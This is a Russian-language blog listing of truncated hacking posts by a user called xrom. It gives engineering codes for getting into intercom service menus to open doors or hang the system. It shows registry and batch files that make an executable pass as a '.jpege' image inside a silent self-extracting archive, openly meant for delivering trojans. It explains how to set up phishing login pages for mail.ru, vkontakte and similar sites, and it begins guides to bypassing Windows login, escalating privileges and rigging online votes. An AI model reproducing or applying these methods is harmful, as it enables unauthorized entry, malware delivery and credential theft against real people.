0 из 0

Создать тему

Темы пользователя xrom

4

Блог xrom FAQ по открытию домофонов (взлом домофона)

Вопрос: Как сделать клон трубки?
Ответ: Открой корпус трубы, там стоит несколько джамперов, которые устанавливают номер квартиру, в которой установлена трубка (актуально для Rainkman).

Вопрос: Как войти в сервисное меню домофона Cifral?
Ответ: Нажать любую цифру и держать до появления надписи, затем ввести инженерный код.

Вопрос: Как войти в системное меню домофона Cifral?
Ответ: Нажать звонок и держать до появления надписи, затем ввести инженерный код.

Вопрос: Как войти в сервисное меню домофона Rainmann (Rainmann 2000 etc. и другие)?
Ответ: Нажимаешь кнопочку «ключ» и вводишь 9 8 7 6 5 4 , должен послышаться двойной звуковой сигнал. Затем вводи 1 2 3 4 5 6 , появится буква P. Ты вошел в систему управления домофоном. Теперь запоминай:
1 — Расширенные настройки домофона, советую самому там не копаться, а просто войти в эту менюшку, и идти попивать пиво неподалеку. Озадаченные жильцы сделают все за вас.
2 — Обычные настройки домофона.
3 — Подача сигнала.
4 — Блокировка двери.
5 — ????
6 — ???? (домофон виснет)
7 — ????
8 — Открыть дверь.
9 — ????
Это действует если только настройки не трогали, вместо 987654 может быть другой код.

Продолжение
xrom 9 лет 5 месяцев 5 дней назад Комментариев16
5

Блог xrom Как угоняют аккаунты на mail.ru (фишинг mail.ru)

Прошу рассматривать данный материал в контексте "Как не стать жертвой мошенников"
В данной статье будет приведен классический пример попытки угона (фишинга) почтового аккаунта.
В данном случае это mail.ru , но способ универсален и применим к любому web сервису

Предыстория

Звонит племянница и жалуется, что у нее взломали аккаунт в социальной сети.
Говорю, меняй везде пароли и в первую очередь на почте.
На резонный вопрос "причем тут почта" - так надо.

Разбор полетов

Итак начинаем расследование как такое могло произойти. Пароли на почте и в соц.сети стояли крепкие, тупому бруту неподвластные.

Спрашиваю у племяшки приходили какие-то запросы от администрации почтовой службы или соц.сети на изменение пароля. Говорит недавно было что-то похожее от mail.ru.

Нахожу это письмо и открываю.

На первый взгляд все прилично. Отправитель mail@antispam.mail.ru, приличное оформление с логотипом mail.ru.
Все ссылки указывают на субдомены в зоне mail.ru ну и конечно тема письма не располагающая к особым раздумьям.
Не удивительно, что на такое ведутся.

Продолжение
xrom 9 лет 5 месяцев 5 дней назад Комментариев3
2

Блог xrom Программы в jpeg формате

Не все юзеры принимают "картинки" в .exe формате... Как бы выкрутится? Есть верный способ! Но при условии что юзер все таки примет 1 экзешник ! И тогда спокойно можно присылть трояны в любом формате !

Для начала пишем 2 файлика .reg и .bat. Вот их содержание:

1. bat файл

regedit /s test.reg

2. reg файл

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.jpege]
@="exefile"
"Content Type"="application/x-msdownload"

[HKEY_CLASSES_ROOT\.jpege\PersistentHandler]
@="{098f2470-bae0-11cd-b579-08002b30bfeb}"

=============================================================================================

И еще потребуется какойнить файл(если формат .jpeg .jpege и т.д то естессна картинку)

Потом архивируем их винраром и делаем sfx архив. А в комментариях пишем:

Path=%userprofile%\system\
SavePath
Setup="%userprofile%\system\имя бат файла с расширением"

Setup="%userprofile%\system\Имя картинки которую пихнем в архив(разумеется с разширением)

Silent=1
Overwrite=1

Потом на архив ставим иконку картинки или любого файла

Продолжение
xrom 9 лет 5 месяцев 5 дней назад

Войдите или зарегистрируйтесь чтобы оставлять комментарии

0

Блог xrom Использование фэйка на практике

Очень часто слышу вопросы из серии «как пользоваться фэйком», «как настроить/залить фейк» и т.д.
Итак, давайте сначала определимся, что есть фэйк.

Фэйк (Fake) (от англ. fake - подделка) – подделка веб-страницы с авторизацией, например точная копия странички сайта vkontakte.ru, но созданная злоумышленником, для того, что Вы ввели туда свои данные (логин/пароль), при вводе эти данные либо отправляються ему на e-mail, либо сохраняються в текстовой файле на хосте.
Итак, фэйк нужной Вам страницы можно сделать самому, для этого нужны небольшие знания языка PHP, а можно и скачать уже готовые, если это фэйк какого-нибудь популярного ресурса (mail.ru, yandex.ru, vkontakte.ru, odnoklassniki.ru, rambler.ru etc). Далее открываем его с помощь. Какого-либо текстового редактора (можно и редактор PHP, дело ваше), и смотрим, сохраняет ли он данные в файл, или отправляет на емейл. Там есть комментарии, посему как правило все понятно, если в коде есть емейл, его надо заменить на свой. После этого фэйк настроен.

Продолжение
xrom 9 лет 5 месяцев 5 дней назад

Войдите или зарегистрируйтесь чтобы оставлять комментарии

2

Блог xrom Взлом локального пароля Windows Vista/Seven

Современный человек уже давно привык к мысли о том, что идеальной защиты не существует. Рано или поздно взломают, разберут всё по кусочкам или испортят. Информационная безопасность стала одной из самых главных фишек нашей жизни. Мы стремимся к ней. Хотим защитить все свои данные. Но не получается…

Сегодня, друзья, мы попробуем поломать локальный пароль одной из самых популярных операционных систем в мире. Она имеет название Windows 7. Получим доступ ко всем личным данным пользователя и скроемся далеко и надолго.
Находим уязвимость

Загрузим систему с паролем. Видим:

1. Поле для ввода пароля

2. Выключение системы

3. Специальные возможности

Если вы догадались, под какой цифрой находится брешь в безопасности, то молодцы!

Смысл всего взлома – заменить командной строкой программу «специальных возможностей».

Для этого нам потребуется дистрибутив с продуктом и немного терпения.

Десять шагов до финиша

Напишу краткую и понятную инструкцию взлома:

1) Загружаемся с LIVE CD в безопасном режиме. После появления установочного окна жмём Repair your computer

Продолжение
xrom 9 лет 5 месяцев 5 дней назад

Войдите или зарегистрируйтесь чтобы оставлять комментарии

2

Блог xrom Взлом учётной записи в Windows XP (ограниченная -> админ)

В данной статье речь пойдёт о том, как в Windows XP изменить тип своей учётной записи, когда другие способы уже бессильны. Причём в случае успеха учётную запись будет невозможно изменить или удалить стандартным путём из-за какого-то неизвестного мне глюка, возникающего при взломе. При этом система работает нормально.

Представьте ситуацию: на работе, в универе или дома злой админ/родитель сделал вас ограниченным пользователем. Понятно, чего вы хотите. Но админ попался параноидальный и читающий интернеты, поэтому встроенный аккаунт "Администратор" запаролен накрепко, как и аккаунт самого админа (пароль длиннее 14 символов, рандомный, написан с использованием латинской, русской, китайской, арабской, еврейской и всех остальных кодировок, цифр и прочих знаков, легко ломаемый LM-хэш отсутствует, а значит, брутфорсить пароль с помощью всяких SAMInside или LCP вы будете очень долго), а сносить пароль админа вы не хотите, поскольку он часто сидит за этим компом под своей учеткой. Остаётся одно:

-------ВЗЛОМ САМОЙ СИСТЕМЫ С ЦЕЛЬЮ ИЗМЕНИТЬ ТИП СВОЕЙ ЗАПИСИ------

Немного теории

Продолжение
xrom 9 лет 5 месяцев 5 дней назад

Войдите или зарегистрируйтесь чтобы оставлять комментарии

3

Блог xrom про голосование тут говорили(пример как увеличить рейтинг)

Накручиваем счетчик голосования на конкретном примере

В этой статье я расскажу тебе о том, как "проголосовать за свой сайт"
много раз. Где это можно использовать? Предположим, на каком-то сайте замутили
голосование на тему "У кого самая клевая телка?". И ты, конечно, решил победить в
этом голосовании.

Варианты ответов, которые предлагаются:
- Вася Пупкин (это ты)
- Иванов
- Петров
- Сидоров
...
и по списку

Возьмем, к примеру, голосование на PHP - Manlix SW Vote v 0.1

В html сорсе все это выглядит так:

Вася Пупкин
Иванов
Петров
Сидоров
...

Анализируем:
============
Данные формы передаются скрипту mnlxswvote.php методом GET,
туда же передается и номер голосования (скрипт может поддерживать несколько голосований)
id=1 и варианты ответа v=1,2,3,4,5,...

Продолжение
xrom 9 лет 5 месяцев 5 дней назад Комментариев2
Наверх